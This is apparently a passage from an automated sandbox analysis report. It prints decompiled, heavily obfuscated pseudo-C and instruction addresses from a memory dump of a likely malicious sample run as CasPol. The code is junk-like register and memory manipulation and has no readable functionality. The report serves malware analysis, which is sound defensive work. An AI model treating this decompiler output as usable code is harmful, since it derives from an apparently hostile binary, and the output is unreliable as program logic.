                                                                                                                                                                                                                                                                                                                            				signed int _t54;
                                                                                                                                                                                                                                                                                                                            				signed int _t56;
                                                                                                                                                                                                                                                                                                                            				signed int _t57;
                                                                                                                                                                                                                                                                                                                            				signed int _t58;
                                                                                                                                                                                                                                                                                                                            				signed int _t71;
                                                                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                                                                            				asm("sbb ebx, 0x52fa1035");
                                                                                                                                                                                                                                                                                                                            				_t34 =  *0x9149a5f7;
                                                                                                                                                                                                                                                                                                                            				 *0x9149a5f7 = _t33;
                                                                                                                                                                                                                                                                                                                            				asm("sbb eax, [0xe3c4ff09]");
                                                                                                                                                                                                                                                                                                                            				asm("ror dword [0x8807cc64], 0x11");
                                                                                                                                                                                                                                                                                                                            				 *0xdd69a5ba =  *0xdd69a5ba >> 0xa0;
                                                                                                                                                                                                                                                                                                                            				 *0x4e36d9ff =  *0x4e36d9ff >> 0x48;
                                                                                                                                                                                                                                                                                                                            				_pop(_t36);
                                                                                                                                                                                                                                                                                                                            				asm("adc [0xa1bce2d], eax");
                                                                                                                                                                                                                                                                                                                            				_t57 = _t56 |  *0x295a8e96;
                                                                                                                                                                                                                                                                                                                            				 *0x7fd723d1 =  *0x7fd723d1 - _t36;
                                                                                                                                                                                                                                                                                                                            				_t51 = _t50 - 1;
                                                                                                                                                                                                                                                                                                                            				 *0xccae1704 =  *0xccae1704 | _t44;
                                                                                                                                                                                                                                                                                                                            				 *0xb350d589 =  *0xb350d589 + _t51;
                                                                                                                                                                                                                                                                                                                            				asm("scasb");
                                                                                                                                                                                                                                                                                                                            				_t54 = (_t52 & 0xbbb90962) - 1;
                                                                                                                                                                                                                                                                                                                            				_t47 = _t46 -  *0xc6d0503a;
                                                                                                                                                                                                                                                                                                                            				if(_t47 < 0) {
                                                                                                                                                                                                                                                                                                                            					asm("adc ebp, [0x2b27c171]");
                                                                                                                                                                                                                                                                                                                            					 *0x1b0ae56d =  *0x1b0ae56d >> 0xf0;
                                                                                                                                                                                                                                                                                                                            					asm("adc [0xc4e9270c], ch");
                                                                                                                                                                                                                                                                                                                            					if( *0x1b0ae56d >= 0) {
                                                                                                                                                                                                                                                                                                                            						__ebx =  *0x7797087c * 0x114a;
                                                                                                                                                                                                                                                                                                                            						 *0x8277630 =  *0x8277630 >> 0x86;
                                                                                                                                                                                                                                                                                                                            						_pop( *0x74fc5998);
						__ebp =  *0xdda39c9d;
						asm("rcr byte [0xf452d688], 0xf4");
						__ch = __ch ^  *0x7426122a;
						asm("sbb [0x28ed1983], edx");
						if(__al < 0x14) {
							 *0xb9eb495 =  *0xb9eb495 << 0xa;
							__edx = __edx + 0xc7cc42fc;
							_t22 = __edi;
							__edi =  *0x160e8f9d;
							 *0x160e8f9d = _t22;
							__ebx = __ebx &  *0x5cacd735;
							 *0x20fc502c =  *0x20fc502c - __bl;
							__ebx = __ebx -  *0x8d5d5f98;
							_push( *0x3bbea12e);
							__cl = __cl +  *0xe5ee3482;
							asm("cmpsw");
							__ebx = __ebx & 0xfe2b6498;
							__ecx = __ecx +  *0x18cf3501;
							asm("ror dword [0xba26651b], 0x23");
							 *0x49a1088f =  *0x49a1088f - __edx;
							__eax = 0x27740139;
							 *0x5f217f10 =  *0x5f217f10 << 0xa3;
							asm("adc [0x7861be83], edi");
							__bl =  *0x3d3c1eb2;
							 *0x1f6c342c =  *0x1f6c342c - __dh;
							asm("rcl byte [0x1ac8f2e6], 0x15");
							asm("rcr byte [0x4f87f0c6], 0x44");
							 *0xdce57084 =  *0xdce57084 + __ch;
							asm("sbb bl, 0x80");
							__ah = __ah &  *0xcb47ec12;
							__al = __al &  *0x23c067a8;
							__ecx = __esp;
							__ebx = __ebx |  *0xd24c3e95;
							__ah = __ah ^  *0x1452e982;
							__edi =  *0x160e8f9d + 1;
							__ecx = __ecx +  *0x8727818c;
							asm("sbb [0x16073ed9], ecx");
							_push(0x340645f0);
							asm("sbb cl, [0x6f6b9bb6]");
							_push(__ebp);
							asm("sbb al, 0xb4");
							if(__ecx == 0) {
								 *0xa4de8275 =  *0xa4de8275 << 0x4a;
								__esi = __esi ^  *0x2d3b512b;
								_push(__ebx);
								_t25 = __edi;
								__edi =  *0xd85537a1;
								 *0xd85537a1 = _t25;
								_push(__ecx);
								if((__esi & 0x96a45696) < 0) {
									 *0x9a2da379 =  *0x9a2da379 ^ __esi;
									__edi = __edi +  *0xd9122639;
									 *0xfd632f2c =  *0xfd632f2c ^ __bh;
									__esi = __esi + 1;
									__ebp = __ebp | 0xb78bf91e;
									__dl = __dl | 0x000000c6;
									if(__dl > 0) {
										__ebx = __ebx + 0x53a0d476;
										__esp = __esp -  *0xbbfdca8d;
										 *0x65b0dc00 =  *0x65b0dc00 >> 0x38;
										 *0x9e05f825 =  *0x9e05f825 >> 0x82;
										asm("sbb esi, [0x55315892]");
										_push( *0xc2055539);
										asm("lodsb");
										__edx =  *0x5553a6f;
										 *0x2e89ebe2 =  *0x2e89ebe2 | __dl;
										_push(__ebp);
										 *0x8de4ba05 =  *0x8de4ba05 - __esp;
										__bl = __bl & 0x00000030;
										_push(__ebp);
										_push( *0x81b59a05);
										__eax = 0x2774013a;
										_push(__ebp);
										_push( *0xe2ba4303);
										__cl = __cl -  *0x509c4104;
										__cl = __cl &  *0x8d0104e2;
										__edi = __edi - 1;
										 *0x6f5704e2 =  *0x6f5704e2 << 0x39;
										__ebp = __ebp + 1;
										__dh = __dh &  *0x76e804e2;
										__edi = __edi + 1;
										__cl = __cl ^ 0x000000e2;
										asm("adc esp, [0x92ecc505]");
										__esp = __esp + 1;
										__ecx = __ecx & 0x75c43105;
										 *0x8405553a =  *0x8405553a >> 0x7d;
										 *0x553c7cc2 = __ebp;
										 *0xe650cb07 = __esi;
										__ah = __ah & 0x000000ca;
										_t26 = __bh;
										__bh =  *0x7861784;
										 *0x7861784 = _t26;
										 *0xe51073ed =  *0xe51073ed - 0x27740139;
										 *0x7861589 =  *0x7861589 >> 0xb2;
										__edi = __edi +  *0xc3a712c2;
										__edx =  *0x7861b93;
										 *0x7861b93 =  *0x5553a6f;
										_pop( *0x14e337cb);
										asm("rol dword [0x8861336], 0x7f");
										asm("sbb ebp, [0xc7fb40f7]");
										_push( *0xf4ddf96c);
										__edi = __edi & 0xb0eeeb11;
										__esi = 0x35659fa9;
										__ebx = __ebx -  *0x243bc7f8;
                                                                                                                                                                                                                                                                                                                            										asm("adc ch, 0x14");
                                                                                                                                                                                                                                                                                                                            										__ebx = 0x74850bb;
                                                                                                                                                                                                                                                                                                                            										asm("scasd");
                                                                                                                                                                                                                                                                                                                            										__bh =  *0x7861784 & 0x00000014;
                                                                                                                                                                                                                                                                                                                            										__esi = 0x793e3972;
                                                                                                                                                                                                                                                                                                                            										_push(__esp);
                                                                                                                                                                                                                                                                                                                            										__bh =  *0xf21f6ea8;
                                                                                                                                                                                                                                                                                                                            										 *0x566bfa80 =  *0x566bfa80 | __dl;
                                                                                                                                                                                                                                                                                                                            										__ebx = 0x74850bb -  *0x7acedaf3;
                                                                                                                                                                                                                                                                                                                            										asm("rcr dword [0x128c0a92], 0x51");
                                                                                                                                                                                                                                                                                                                            										__ecx = __ecx -  *0xe5eb0f16;
                                                                                                                                                                                                                                                                                                                            										asm("rol dword [0x1361c4d6], 0x56");
                                                                                                                                                                                                                                                                                                                            										 *0xad8bfcd2 =  *0xad8bfcd2 >> 0x86;
                                                                                                                                                                                                                                                                                                                            										__edi = __edi + 1;
                                                                                                                                                                                                                                                                                                                            										__ebp = __ebp |  *0x2a9ccad6;
                                                                                                                                                                                                                                                                                                                            										asm("cmpsw");
                                                                                                                                                                                                                                                                                                                            										__edi = __edi ^  *0xb4fed90b;
                                                                                                                                                                                                                                                                                                                            										__ah = __ah &  *0xce45fa80;
                                                                                                                                                                                                                                                                                                                            										 *0x87b8cc06 =  *0x87b8cc06 - __edx;
                                                                                                                                                                                                                                                                                                                            										__dh = __dh ^  *0xc6c4d38;
                                                                                                                                                                                                                                                                                                                            										asm("movsb");
                                                                                                                                                                                                                                                                                                                            										__ah =  *0xd5c0acb7;
                                                                                                                                                                                                                                                                                                                            										__ecx = __ecx +  *0xfc8a6f1b;
                                                                                                                                                                                                                                                                                                                            										__esp = __esp -  *0x7fd3493;
                                                                                                                                                                                                                                                                                                                            										_t30 = __edx;
                                                                                                                                                                                                                                                                                                                            										__edx =  *0xcc83e4c0;
                                                                                                                                                                                                                                                                                                                            										 *0xcc83e4c0 = _t30;
                                                                                                                                                                                                                                                                                                                            										 *0x168658d3 =  *0x168658d3 - 0x35659fa9;
                                                                                                                                                                                                                                                                                                                            										__ebx = 0x74850bb -  *0x7acedaf3 - 1;
                                                                                                                                                                                                                                                                                                                            										 *0x715539ff =  *0x715539ff ^ __ecx;
                                                                                                                                                                                                                                                                                                                            										if( *0x715539ff >= 0) {
                                                                                                                                                                                                                                                                                                                            											__edi =  *0x329657c * 0x1bb9;
                                                                                                                                                                                                                                                                                                                            											__ecx =  *0x1cec9a60 * 0x406b;
                                                                                                                                                                                                                                                                                                                            											asm("adc [0xc05b11e1], al");
                                                                                                                                                                                                                                                                                                                            											_push(0x35659fa9);
                                                                                                                                                                                                                                                                                                                            											 *0xf2f6e8cc =  *0xf2f6e8cc << 2;
                                                                                                                                                                                                                                                                                                                            											__ah =  *0x8ca359e1;
                                                                                                                                                                                                                                                                                                                            											asm("rcr byte [0x96dcbc6], 0x2b");
                                                                                                                                                                                                                                                                                                                            											__edx = __edx - 1;
                                                                                                                                                                                                                                                                                                                            											asm("scasd");
                                                                                                                                                                                                                                                                                                                            											asm("adc cl, 0x1c");
                                                                                                                                                                                                                                                                                                                            											__ch = __ch | 0x000000e5;
                                                                                                                                                                                                                                                                                                                            											_t31 = __bl;
                                                                                                                                                                                                                                                                                                                            											__bl =  *0x36b5c7e0;
                                                                                                                                                                                                                                                                                                                            											 *0x36b5c7e0 = _t31;
                                                                                                                                                                                                                                                                                                                            											__ecx = 1 +  *0x1cec9a60 * 0x406b;
                                                                                                                                                                                                                                                                                                                            											asm("rcr dword [0x66418594], 0x4c");
                                                                                                                                                                                                                                                                                                                            											__esp = __esp + 0x434390db;
                                                                                                                                                                                                                                                                                                                            											asm("rcr dword [0x15a662f], 0xe3");
                                                                                                                                                                                                                                                                                                                            											 *0xc910e6ec =  *0xc910e6ec << 0xc4;
                                                                                                                                                                                                                                                                                                                            											__edi =  *0xda71b703;
                                                                                                                                                                                                                                                                                                                            											asm("rcl byte [0x6fe6b620], 0x68");
                                                                                                                                                                                                                                                                                                                            											__bl = 0xb4;
                                                                                                                                                                                                                                                                                                                            											__edx =  *0xa4678798;
                                                                                                                                                                                                                                                                                                                            											__esp =  *0x6322cc1e;
                                                                                                                                                                                                                                                                                                                            											 *0x68dfcd38 =  *0x68dfcd38 >> 0x9b;
                                                                                                                                                                                                                                                                                                                            											__ebx = __ebx + 0x67cb9a9d;
                                                                                                                                                                                                                                                                                                                            											asm("sbb esp, 0x83cff40b");
                                                                                                                                                                                                                                                                                                                            											asm("rol dword [0x4f263916], 0x4a");
                                                                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                                                                            				L1:
                                                                                                                                                                                                                                                                                                                            				 *0x43524309 =  *0x43524309 & _t58;
                                                                                                                                                                                                                                                                                                                            				asm("sbb dh, 0xe7");
                                                                                                                                                                                                                                                                                                                            				asm("sbb edx, 0x82220d1b");
                                                                                                                                                                                                                                                                                                                            				if(( *0xe943ed04 & _t47) < 0) {
                                                                                                                                                                                                                                                                                                                            					_t37 =  *0x5f4f9371;
                                                                                                                                                                                                                                                                                                                            					asm("rcl byte [0x1d77d2e4], 0xcb");
                                                                                                                                                                                                                                                                                                                            					_push(0xc3526c8);
                                                                                                                                                                                                                                                                                                                            					 *0xf2718031 =  *0xf2718031 << 0x6b;
                                                                                                                                                                                                                                                                                                                            					_push( *0x768df2d5);
                                                                                                                                                                                                                                                                                                                            					_t58 = _t58 +  *0xfd6fb6f8;
                                                                                                                                                                                                                                                                                                                            					asm("adc [0xf0f70d08], cl");
                                                                                                                                                                                                                                                                                                                            					if(_t58 >= 0) {
                                                                                                                                                                                                                                                                                                                            						asm("sbb ebp, 0xaf302878");
						_t39 =  *0xd555c1d;
						 *0xd555c1d = _t37 + 0x26f805f4;
						asm("rol dword [0xd4fd1f0d], 0x47");
						_t54 = _t54 ^  *0x8c671335;
						_t51 = _t51 +  *0x1e3a4d21;
						_t11 = _t57;
						_t57 =  *0x9702ba6e;
						 *0x9702ba6e = _t11;
						asm("cmpsw");
						if( *0x2a496f10 >= _t47) {
							_t40 = _t39 - 0xe9067f78;
							 *0xe9afa29f =  *0xe9afa29f - _t34;
							_t44 = _t44 -  *0xa6b6bd0a;
							_t51 = _t51 & 0x151a3439;
							_t71 = _t51;
							asm("rcr byte [0x904410a], 0x15");
							asm("adc edx, [0x6ec2c2b9]");
							if(_t71 >= 0) {
								_t12 = _t47;
								_t47 =  *0xcc44272;
								 *0xcc44272 = _t12;
								_t51 = 0xc568051b;
								if(_t71 == 0) {
									_t34 = _t34 - 0xa553675;
									 *0xd2b9e192 = _t40;
									asm("rol dword [0xdf2fc60f], 0x91");
									_t57 = _t57 &  *0xf809aa31;
									 *0x24d95062 =  *0x24d95062 >> 0xd4;
									 *0x12a951cc =  *0x12a951cc << 0xdb;
									_t44 =  *0xde75bbeb;
									_t18 = (_t47 &  *0xd03e682) - 0xe2;
									_t47 =  *0xaea0fc25;
									 *0xaea0fc25 = _t18;
									asm("sbb eax, 0x18d67083");
									asm("cmpsw");
									_t54 = 0x047197fa &  *0x5d967e2b;
									if(0x47197fa != 0) {
										asm("sbb ecx, [0x965cf74]");
										 *0x16c6af0 =  *0x16c6af0 + _t57;
										if( *0x16c6af0 > 0 &&  *0xd215827e * 0x46ab < 0) {
											_t19 = _t47;
											_t47 =  *0x9d4a1571;
											 *0x9d4a1571 = _t19;
										}
									}
								}
							}
						}
					}
				}
				goto L1;
			}




















                                                                                                                                                                                                                                                                                                                            0x00421bc9
                                                                                                                                                                                                                                                                                                                            0x00421bcf
                                                                                                                                                                                                                                                                                                                            0x00421bd5
                                                                                                                                                                                                                                                                                                                            0x00421bd6
                                                                                                                                                                                                                                                                                                                            0x00421bdc
                                                                                                                                                                                                                                                                                                                            0x00421be2
                                                                                                                                                                                                                                                                                                                            0x00421be7
                                                                                                                                                                                                                                                                                                                            0x00421bed
                                                                                                                                                                                                                                                                                                                            0x00421bee
                                                                                                                                                                                                                                                                                                                            0x00421bf0
                                                                                                                                                                                                                                                                                                                            0x00421bf6
                                                                                                                                                                                                                                                                                                                            0x00421bfd
                                                                                                                                                                                                                                                                                                                            0x00421c03
                                                                                                                                                                                                                                                                                                                            0x00421c0a
                                                                                                                                                                                                                                                                                                                            0x00421c0a
                                                                                                                                                                                                                                                                                                                            0x00421c0a
                                                                                                                                                                                                                                                                                                                            0x00421c10
                                                                                                                                                                                                                                                                                                                            0x00421c11
                                                                                                                                                                                                                                                                                                                            0x00421c17
                                                                                                                                                                                                                                                                                                                            0x00421c1d
                                                                                                                                                                                                                                                                                                                            0x00421c23
                                                                                                                                                                                                                                                                                                                            0x00421c29
                                                                                                                                                                                                                                                                                                                            0x00421c2a
                                                                                                                                                                                                                                                                                                                            0x00421c30
                                                                                                                                                                                                                                                                                                                            0x00421c33
                                                                                                                                                                                                                                                                                                                            0x00421c39
                                                                                                                                                                                                                                                                                                                            0x00421c3f
                                                                                                                                                                                                                                                                                                                            0x00421c45
                                                                                                                                                                                                                                                                                                                            0x00421c4c
                                                                                                                                                                                                                                                                                                                            0x00421c53
                                                                                                                                                                                                                                                                                                                            0x00421c5f
                                                                                                                                                                                                                                                                                                                            0x00421c65
                                                                                                                                                                                                                                                                                                                            0x00421c66
                                                                                                                                                                                                                                                                                                                            0x00421c6c
                                                                                                                                                                                                                                                                                                                            0x00421c72
                                                                                                                                                                                                                                                                                                                            0x00421c73
                                                                                                                                                                                                                                                                                                                            0x00421c79
                                                                                                                                                                                                                                                                                                                            0x00421c7c
                                                                                                                                                                                                                                                                                                                            0x00421c7d
                                                                                                                                                                                                                                                                                                                            0x00421c83
                                                                                                                                                                                                                                                                                                                            0x00421c84
                                                                                                                                                                                                                                                                                                                            0x00421c85
                                                                                                                                                                                                                                                                                                                            0x00421c8b
                                                                                                                                                                                                                                                                                                                            0x00421c91
                                                                                                                                                                                                                                                                                                                            0x00421c97
                                                                                                                                                                                                                                                                                                                            0x00421c98
                                                                                                                                                                                                                                                                                                                            0x00421c9f
                                                                                                                                                                                                                                                                                                                            0x00421ca0
                                                                                                                                                                                                                                                                                                                            0x00421ca6
                                                                                                                                                                                                                                                                                                                            0x00421ca7
                                                                                                                                                                                                                                                                                                                            0x00421caa
                                                                                                                                                                                                                                                                                                                            0x00421cb0
                                                                                                                                                                                                                                                                                                                            0x00421cb2
                                                                                                                                                                                                                                                                                                                            0x00421cb8
                                                                                                                                                                                                                                                                                                                            0x00421cbf
                                                                                                                                                                                                                                                                                                                            0x00421cc5
                                                                                                                                                                                                                                                                                                                            0x00421ccb
                                                                                                                                                                                                                                                                                                                            0x00421cce
                                                                                                                                                                                                                                                                                                                            0x00421cce
                                                                                                                                                                                                                                                                                                                            0x00421cce
                                                                                                                                                                                                                                                                                                                            0x00421cd4
                                                                                                                                                                                                                                                                                                                            0x00421cda
                                                                                                                                                                                                                                                                                                                            0x00421ce1
                                                                                                                                                                                                                                                                                                                            0x00421ce7
                                                                                                                                                                                                                                                                                                                            0x00421ce7
                                                                                                                                                                                                                                                                                                                            0x00421ced
                                                                                                                                                                                                                                                                                                                            0x00421cf3
                                                                                                                                                                                                                                                                                                                            0x00421cfa
                                                                                                                                                                                                                                                                                                                            0x00421d00
                                                                                                                                                                                                                                                                                                                            0x00421d06
                                                                                                                                                                                                                                                                                                                            0x00421d0c
                                                                                                                                                                                                                                                                                                                            0x00421d11
                                                                                                                                                                                                                                                                                                                            0x00421d17
                                                                                                                                                                                                                                                                                                                            0x00421d1a
                                                                                                                                                                                                                                                                                                                            0x00421d20
                                                                                                                                                                                                                                                                                                                            0x00421d21
                                                                                                                                                                                                                                                                                                                            0x00421d24
                                                                                                                                                                                                                                                                                                                            0x00421d2a
                                                                                                                                                                                                                                                                                                                            0x00421d2b
                                                                                                                                                                                                                                                                                                                            0x00421d31
                                                                                                                                                                                                                                                                                                                            0x00421d37
                                                                                                                                                                                                                                                                                                                            0x00421d3d
                                                                                                                                                                                                                                                                                                                            0x00421d44
                                                                                                                                                                                                                                                                                                                            0x00421d4a
                                                                                                                                                                                                                                                                                                                            0x00421889
                                                                                                                                                                                                                                                                                                                            0x00421877
                                                                                                                                                                                                                                                                                                                            0x0042180e
                                                                                                                                                                                                                                                                                                                            0x004217fd
                                                                                                                                                                                                                                                                                                                            0x004217cc
                                                                                                                                                                                                                                                                                                                            0x0042177f
                                                                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 493df67c17a57220136a3a431873e24b80dd878fa4c9004949634f6035b7a20f
                                                                                                                                                                                                                                                                                                                            • Instruction ID: c96f52268bd808e0f86791674295f5cbb5691465914864946b0ced430e9cd7b5
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 493df67c17a57220136a3a431873e24b80dd878fa4c9004949634f6035b7a20f
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 14D1C9729087A1CFDB16CF39E89AB413FB1F796320788029ED1E187692D3362155CF99
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            C-Code - Quality: 51%
                                                                                                                                                                                                                                                                                                                            			E004222E6(signed int __eax, signed int __ebx, signed int __ecx, void* __edx, signed int __edi) {
                                                                                                                                                                                                                                                                                                                            				signed int __esi;
                                                                                                                                                                                                                                                                                                                            				signed char _t32;
                                                                                                                                                                                                                                                                                                                            				signed char _t33;
                                                                                                                                                                                                                                                                                                                            				signed int _t36;
                                                                                                                                                                                                                                                                                                                            				intOrPtr _t38;
                                                                                                                                                                                                                                                                                                                            				intOrPtr _t40;
                                                                                                                                                                                                                                                                                                                            				intOrPtr _t41;
                                                                                                                                                                                                                                                                                                                            				signed int _t46;
                                                                                                                                                                                                                                                                                                                            				signed int _t47;
                                                                                                                                                                                                                                                                                                                            				intOrPtr _t49;
                                                                                                                                                                                                                                                                                                                            				signed char _t53;
                                                                                                                                                                                                                                                                                                                            				signed int _t56;
                                                                                                                                                                                                                                                                                                                            				signed int _t57;
                                                                                                                                                                                                                                                                                                                            				signed int _t58;
                                                                                                                                                                                                                                                                                                                            				signed int _t59;
                                                                                                                                                                                                                                                                                                                            				signed int _t61;
                                                                                                                                                                                                                                                                                                                            				void* _t64;
                                                                                                                                                                                                                                                                                                                            				signed int _t66;
                                                                                                                                                                                                                                                                                                                            				signed int _t77;
                                                                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                                                                            				_t56 = __edi;
                                                                                                                                                                                                                                                                                                                            				_t32 =  *0x4e2f42a9;
                                                                                                                                                                                                                                                                                                                            				 *0x4e2f42a9 = __eax &  *0x1a6a54bb;
                                                                                                                                                                                                                                                                                                                            				asm("rcr dword [0x72c2a333], 0xba");
                                                                                                                                                                                                                                                                                                                            				 *0x4019ae37 =  *0x4019ae37 + _t32;
                                                                                                                                                                                                                                                                                                                            				asm("sbb ecx, 0x61458126");
                                                                                                                                                                                                                                                                                                                            				asm("rol byte [0x672d71c], 0xa8");
                                                                                                                                                                                                                                                                                                                            				_push(_t57);
                                                                                                                                                                                                                                                                                                                            				_t58 = _t57 |  *0xb46b12bf;
                                                                                                                                                                                                                                                                                                                            				 *0x5587e7cd =  *0x5587e7cd ^ _t58;
                                                                                                                                                                                                                                                                                                                            				_t59 =  *0x95dc9927;
                                                                                                                                                                                                                                                                                                                            				 *0x95dc9927 = _t58;
                                                                                                                                                                                                                                                                                                                            				asm("ror byte [0x9f21f7e3], 0xc5");
                                                                                                                                                                                                                                                                                                                            				asm("sbb ebx, [0x5e16bc2]");
                                                                                                                                                                                                                                                                                                                            				_t46 = __ecx &  *0x42ccf22e;
                                                                                                                                                                                                                                                                                                                            				asm("adc ch, [0xd8091610]");
                                                                                                                                                                                                                                                                                                                            				_t36 = (__ebx ^  *0xafdd5ec6) & 0x000000b4;
                                                                                                                                                                                                                                                                                                                            				asm("rol byte [0x4d46edb6], 0xb0");
                                                                                                                                                                                                                                                                                                                            				 *0xa5036418 =  *0xa5036418 << 0xc;
                                                                                                                                                                                                                                                                                                                            				 *0x886f14de =  *0x886f14de & _t36;
                                                                                                                                                                                                                                                                                                                            				 *0x30195e35 =  *0x30195e35 + _t46;
                                                                                                                                                                                                                                                                                                                            				_t47 = _t46 ^  *0x44e5a5fb;
                                                                                                                                                                                                                                                                                                                            				 *0xf03275c5 =  *0xf03275c5 >> 0x30;
                                                                                                                                                                                                                                                                                                                            				 *0xb6a1c124 =  *0xb6a1c124 + _t47;
                                                                                                                                                                                                                                                                                                                            				 *0x2117df34 =  *0x2117df34 >> 0x67;
                                                                                                                                                                                                                                                                                                                            				_t33 = _t32 &  *0x11f772c6;
                                                                                                                                                                                                                                                                                                                            				asm("sbb edx, [0x28789a93]");
                                                                                                                                                                                                                                                                                                                            				_t61 =  *0x95d80d60 * 0x3832;
                                                                                                                                                                                                                                                                                                                            				asm("adc esi, [0x49098393]");
                                                                                                                                                                                                                                                                                                                            				_t64 = _t46;
                                                                                                                                                                                                                                                                                                                            				_push(_t36 +  *0x7231e7ec);
                                                                                                                                                                                                                                                                                                                            				asm("scasd");
                                                                                                                                                                                                                                                                                                                            				asm("adc [0x74109b1e], esi");
                                                                                                                                                                                                                                                                                                                            				asm("adc cl, 0x88");
                                                                                                                                                                                                                                                                                                                            				_t53 = __edx + 0xe8;
                                                                                                                                                                                                                                                                                                                            				_t49 = _t47 + 0x18 - 1;
				_t66 = _t64 +  *0x958a921d + 1;
				if(_t33 >  *0xb94b8fe2) {
					__edx =  *0xda15b97e * 0x743d;
					asm("adc [0xdb625def], esp");
					asm("scasd");
					 *0x3e15ae37 =  *0x3e15ae37 ^ __esp;
					asm("rcr byte [0x935c63], 0xc6");
					 *0x96e8521b =  *0x96e8521b >> 0x8b;
					if(__ebx <=  *0xd86271cb) {
						goto L1;
					}
					asm("rcl dword [0xdf9ae876], 0x44");
					__ah = __ah + 0x86;
					__esp =  *0x1174996a * 0x6753;
					__ebx = __ebx + 1;
					asm("rcr dword [0xf704eec7], 0x33");
					_t17 = __eax;
					__eax =  *0x8255498d;
					 *0x8255498d = _t17;
					asm("rcr byte [0x8c22b0f9], 0x82");
					__edi = __edi - 1;
					asm("scasd");
					_push( *0xa7adcc11);
					__cl = __cl ^  *0x6cccacd0;
					asm("rol byte [0xaff92824], 0x15");
					__esi = __esi + 0x47814919;
					 *0xfd663625 = __edi;
					asm("sbb [0xee8483d3], edi");
					 *0x26f2b062 =  *0x26f2b062 & __ecx;
					__ebp = __edi;
					asm("rcr dword [0xe395dc95], 0x9b");
					 *0x71e011f7 =  *0x71e011f7 + __ecx;
					asm("ror byte [0x2a998712], 0xae");
					__esi = __esi |  *0xf731b9be;
					asm("sbb [0x6260ce9a], eax");
					_pop(__esi);
					__edi = __edi - 1;
					asm("scasd");
					__ebx = __ebx + 0x144e0021;
					 *0x44724e8a =  *0x44724e8a << 0x4e;
					L1();
					__eax =  *0x8255498d -  *0xa709bce8;
					 *0x483788f0 = __ecx;
					__edx = __edx - 1;
					if(__edx >= 0) {
						goto L1;
					}
					 *0x54418336 =  *0x54418336 ^ __ebp;
					__ebp =  *0x3548fb69 * 0x115e;
					asm("adc esp, [0x6a62a965]");
					_push(__esi);
					__ebp =  *0x2da9ee23;
					 *0x2da9ee23 =  *0x3548fb69 * 0x115e;
					__ecx = __ecx |  *0xd0485607;
					 *0xaf4f5227 =  *0xaf4f5227 >> 0xf4;
					_push( *0xace9fa0d);
					if( *0xaf4f5227 < 0) {
						goto L1;
					}
					__ebp = __ebp + 0xb33344ed;
					 *0x9153528 =  *0x9153528 ^ __cl;
					__cl =  *0x8d190d02;
					__ecx = __ecx - 1;
					__eax = __eax +  *0x4cc1f6f8;
					__ebx = __ebx &  *0x1b9edc17;
					__al = __al & 0x00000024;
					__edi =  *0xd045dbed;
					 *0x161174e2 =  *0x161174e2 << 0x7f;
					_push( *0x75615292);
					__al = __al | 0x000000d2;
					__edi =  *0xd045dbed ^  *0x5af4519f;
					_pop(__esi);
					__edi = ( *0xd045dbed ^  *0x5af4519f) - 1;
					asm("scasd");
					__ebx = 0xcf33c11d;
					 *0xfd19fffe =  *0xfd19fffe ^ 0xcf33c11d;
					asm("rcl dword [0x3ce3589d], 0x56");
					if( *0xfd19fffe >= 0) {
						goto L1;
					}
					__ecx = __ecx |  *0xad74873;
					asm("rol dword [0xf95bedc1], 0xe6");
					__edi = __edi - 1;
					asm("scasb");
					__esi = __esi - 0xa1b38a15;
					__edi = __edi &  *0xb70b8603;
					 *0xdedc1cbd =  *0xdedc1cbd >> 0x7a;
					_push( *0x4ee680bd);
					asm("adc eax, [0xb0222d15]");
					 *0xd2197499 =  *0xd2197499 >> 0x1e;
					asm("rcr byte [0x7b1ef32a], 0x4c");
					asm("sbb [0xa9dac10c], ch");
					if(__edi < 0) {
						goto L1;
					}
					_t27 = __edi;
					__edi =  *0x24ce0f6e;
					 *0x24ce0f6e = _t27;
					 *0x74068024 =  *0x74068024 << 0x82;
					_pop(__ecx);
					 *0x15f772dc =  *0x15f772dc |  *0x3e5e5439;
					__edx = __edx - 1;
					__bl = __bl |  *0x78021663;
					__ah = __ah |  *0x90bc2080;
					__dl = __dl - 0x80;
                                                                                                                                                                                                                                                                                                                            					__ecx = __ecx |  *0x1c19326e;
                                                                                                                                                                                                                                                                                                                            					__eax =  *0xd74996a * 0x26d3;
                                                                                                                                                                                                                                                                                                                            					 *0x5c356fe1 =  *0x5c356fe1 << 6;
                                                                                                                                                                                                                                                                                                                            					 *0xfa87d725 =  *0xfa87d725 >> 0x84;
                                                                                                                                                                                                                                                                                                                            					asm("lodsd");
                                                                                                                                                                                                                                                                                                                            					__esi = __esi ^ 0x0c1d3521;
                                                                                                                                                                                                                                                                                                                            					_push(__edx);
                                                                                                                                                                                                                                                                                                                            					 *0x1b1cf05 =  *0x1b1cf05 ^ __esi;
                                                                                                                                                                                                                                                                                                                            					 *0x48b2f7b3 = __bl;
                                                                                                                                                                                                                                                                                                                            					asm("sbb ecx, [0xb05bf927]");
                                                                                                                                                                                                                                                                                                                            					asm("sbb esp, [0x5803ae15]");
                                                                                                                                                                                                                                                                                                                            					__ebp = ( *0x15f772dc |  *0x3e5e5439) - 0xdb51552f;
                                                                                                                                                                                                                                                                                                                            					asm("scasd");
                                                                                                                                                                                                                                                                                                                            					__ecx = __ecx | 0xaf15ae37;
                                                                                                                                                                                                                                                                                                                            					 *0xae3cad18 =  *0xae3cad18 << 0x64;
